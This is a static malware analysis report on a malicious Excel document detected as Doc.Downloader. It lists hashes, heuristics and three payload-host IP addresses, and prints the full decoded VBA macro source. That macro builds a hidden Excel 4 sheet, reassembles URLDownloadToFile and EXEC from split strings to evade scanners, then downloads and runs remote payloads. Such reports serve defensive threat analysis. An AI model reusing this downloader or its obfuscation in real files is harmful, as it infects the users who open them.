Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fea0100e24ce67ce…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 133.0 KB
Created: 2015-06-05 18:17:20
Authoring application: Microsoft Excel
First seen: 2021-10-14
MD5: fe3ef871fd0e9af6823e1439cae02ba1
SHA-1: d22e8b3552738535d6fe1a2579d9b6f6cd07b7f6
SHA-256: fea0100e24ce67ce44429d52517b711acd3b1299ca44c3177a3da9480a3a3f16
Risk score: 222

Malware Insights

MITRE ATT&CK
  • T1059.005 (Visual Basic)
  • T1105 (Ingress Tool Transfer)

The file is an Excel document containing VBA macros, including an Auto_Open subroutine. Critical heuristics indicate that the API name 'URLDownloadToFile' is reassembled from split string literals to evade keyword scanning, suggesting the macro's purpose is to download a payload. The embedded URLs are likely sources for this payload. The ClamAV detection name 'Doc.Downloader' further supports this assessment.

Heuristics (6)

  • ClamAV: Doc.Downloader.Docusign112100-9908075-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Docusign112100-9908075-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Dangerous API name reassembled from split string literals [critical] OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • Auto_Open macro [high] OLE_VBA_AUTO
    Auto_Open macro
  • Auto_Close macro [high] OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs extracted, each found in document text (OLE body):
      • http://5.196.247.6/ (trailing characters garbled in the extracted text)
      • http://94.140.112.149/
      • http://84.246.85.196//

Extracted artifacts (1)

Files carved from inside the sample during analysis.

  • Filename: macros.bas
    Kind: vba-macro
    Source: oletools.olevba.extract_macros (decoded VBA source)
    Size: 3568 bytes
    SHA-256: 57dbf314ba8d8e0cd5ae01430a1b3452bf5356fd0c3f739414504ecdf5e48acc

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Public Sub applyLogosToDashboard()


End Sub


Private Sub asWorkbook_Activateas()

End Sub

Private Sub saWorkbook_Opensa()
    On Error Resume Next


End Sub

Private Sub ssaaInitWorkbookssaa()
End Sub




Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{D019F920-D807-4C28-8E76-E08AEEA9D280}{8B26FE1D-F797-4308-AC6E-5B76F083A7BE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Module5"

Sub auto_open()
Retio


Application.Run Sheets("Niola").Range("H1")

End Sub







Function dfgdf()
Sheets("Niola").Range("H24") = UserForm2.Label1.Caption
Sheets("Niola").Range("H25") = UserForm2.Label3.Caption
Sheets("Niola").Range("H26") = UserForm2.Label4.Caption
End Function



Attribute VB_Name = "Module1"

Function jgfjgjfhfhf()
Application.ScreenUpdating = False

Excel4IntlMacroSheets.Add.Name = "Niola"
Sheets("Niola").Visible = False
Nyrtyfh
dfgdf
End Function
Sub auto_close()


Pola

End Sub

Function Nyrtyfh()
Sheets("Niola").Range("A1:M100").Font.Color = vbWhite

End Function


Function hkjhjk()
Sheets("Niola").Range("G10") = UserForm2.Label5.Caption
Sheets("Niola").Range("G11") = UserForm2.Label5.Caption & "1"
Sheets("Niola").Range("G12") = UserForm2.Label5.Caption & "2"

End Function


Function Fdjgj()
Sheets("Niola").Range("H10") = "=Byukilos(0,H24&K17&K18,G10,0,0)"
Sheets("Niola").Range("H11") = "=Byukilos(0,H25&K17&K18,G11,0,0)"
Sheets("Niola").Range("H12") = "=Byukilos(0,H26&K17&K18,G12,0,0)"

End Function

Function Pola()
Application.ScreenUpdating = True
   Application.DisplayAlerts = False
   Sheets("Niola").Delete
   Application.DisplayAlerts = True
End Function

Attribute VB_Name = "Module2"
Function Retio()
On Error Resume Next

net = "uRl"
net1 = "Mon"

Bytruy = "R" & "E" & "G" & "I" & "STER"
Neyrey = "="
JRyf = "" & "E" & "" & "X" & "" & "E" & "" & "C"
Loiu = UserForm2.Blost.Caption
jgfjgjfhfhf


Sheets("Niola").Range("K17") = "=N" & "O" & "W()"
Sheets("Niola").Range("K18") = ".d" & "a" & "t"



Sheets("Niola").Range("H35") = "=" & "H" & "ALT()"
Sheets("Niola").Range("I9") = net & net1
Sheets("Niola").Range("I10") = "U" & "RL" & "Do" & "wn" & "lo" & "ad" & "To" & "Fi" & "le" & "A"
Sheets("Niola").Range("I11") = "J" & "J" & "C" & "C" & "B" & "B"
Sheets("Niola").Range("I12") = "Byukilos"

hkjhjk

Sheets("Niola").Range("I17") = Loiu
Sheets("Niola").Range("I18") = Loiu & "1"
Sheets("Niola").Range("I19") = Loiu & "2"

Fdjgj

Sheets("Niola").Range("H9") = Neyrey & Bytruy & "(I9,I10&J10,I11,I12,,1,9)"
Sheets("Niola").Range("H17") = Neyrey & JRyf & "(I17)"
Sheets("Niola").Range("H18") = Neyrey & JRyf & "(I18)"
Sheets("Niola").Range("H19") = Neyrey & JRyf & "(I19)"
End Function